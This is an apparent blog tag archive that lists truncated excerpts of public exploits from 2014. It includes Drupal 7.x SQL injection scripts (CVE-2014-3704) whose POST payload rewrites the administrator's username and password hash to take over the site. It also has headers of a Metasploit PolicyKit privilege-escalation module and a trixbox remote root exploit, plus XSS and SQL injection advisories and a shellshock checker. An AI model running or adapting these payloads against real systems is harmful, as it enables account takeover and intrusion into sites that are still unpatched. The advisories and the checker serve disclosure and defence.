Tags archives: security

 

0

Drupal Core 7.32 SQL Injection

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 #Creditz to https://www.reddit.com/user/fyukyuk import urllib2,sys from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py host = sys.argv[1] user = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 3: print “host username password” print “http://nope.io admin wowsecure” hash = DrupalHash(“$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML”, password).get_hash() target = ‘%s/?q=node&destination=node’ % host post_data = “name[0%20;update+users+set+name%3d'" +user +"'+,+pass+%3d+'" [...]

 

0

Drupal Core 7.32 SQL Injection

<?php #—————————————————————————–# # Exploit Title: Drupal core 7.x – SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: http://www.drupal.com/ # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #—————————————————————————–#   $url = ‘http://www.example.com’; $post_data = “name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in”; [...]

 

0

Linux PolicyKit Race Condition Privilege Escalation

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking   include Msf::Exploit::EXE include Msf::Post::File   include Msf::Exploit::Local::Linux   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Linux PolicyKit Race Condition Privilege Escalation’, ‘Description’ => %q( A race condition flaw was found in the PolicyKit pkexec [...]

 

0

Fonality Trixbox CE 2.8.0.4 Command Execution

#!/usr/bin/perl # # Title: Fonality trixbox CE remote root exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Discovered & Coded: 2 June 2014 # Published: 17 October 2014 # MorXploit Research # http://www.MorXploit.com # Software: trixbox CE # Version: trixbox-2.8.0.4.iso # Vendor url: http://www.fonality.com/ # Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/ # Vulnerable file: maint/modules/home/index.php # # [...]

 

0

Drupal 7.X SQL Injection

#!/usr/bin/python # # # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 # Inspired by yukyuk’s P.o.C (https://www.reddit.com/user/fyukyuk) # # Tested on Drupal 7.31 with BackBox 3.x # # This material is intended for educational # purposes only and the author can not be held liable for # any kind of damages done whatsoever to your machine, [...]

 

0

WordPress MaxButtons 1.26.0 Cross Site Scripting

Advisory ID: HTB23237 Product: MaxButtons WordPress plugin Vendor: Max Foundry Vulnerable Version(s): 1.26.0 and probably prior Tested Version: 1.26.0 Advisory Publication: September 24, 2014 [without technical details] Vendor Notification: September 24, 2014 Vendor Patch: October 2, 2014 Public Disclosure: October 15, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7181 Risk Level: Low CVSSv2 Base [...]

 

0

WordPress WP Google Maps 6.0.26 Cross Site Scripting

Advisory ID: HTB23236 Product: WP Google Maps WordPress plugin Vendor: WP Google Maps Vulnerable Version(s): 6.0.26 and probably prior Tested Version: 6.0.26 Advisory Publication: September 24, 2014 [without technical details] Vendor Notification: September 24, 2014 Vendor Patch: September 29, 2014 Public Disclosure: October 15, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7182 Risk Level: [...]

 

0

Mozilla browser mem disclosure bugs (CVE-2014-1580)

RIFERIMENTO: https://access.redhat.com/security/cve/CVE-2014-1580 CVE-2014-1580 Impatto: Moderate Pubblico: 2014-10-14 Bugzilla: 1152362: CVE-2014-1580 Mozilla: Further uninitialized memory use during GIF rendering (MFSA 2014-78) Public POC: First of all, CVE-2014-1580 (MSFA 2014-78) is a bug that caused Firefox prior to version 33 (released today) to leak bits of uninitialized memory when rendering certain types of truncated images onto <canvas>. [...]

 

0

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA   # Risk: High   # CWE number: CWE-89,CWE-79   # Date: 13/10/2014   # Vendor: www.jttel.com.tw   # Author: Felipe ” Renzi ” Gabriel   # Contact: renzi@linuxmail.org   # Tested on: Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906   # Vulnerables File: news.php ; [...]

 

0

bashcheck local shellshock checker

#!/bin/bash   warn() { if [ "$scary" == "1" ]; then echo -e “33[91mVulnerable to $133[39m" else echo -e "33[93mFound non-exploitable $133[39m" fi }   good() { echo -e "33[92mNot vulnerable to $133[39m" }   tmpdir=`mktemp -d -t tmp.XXXXXXXX`   [ -n "$1" ] && bash=$(which $1) || bash=$(which bash) echo -e “33[95mTesting $bash ..." [...]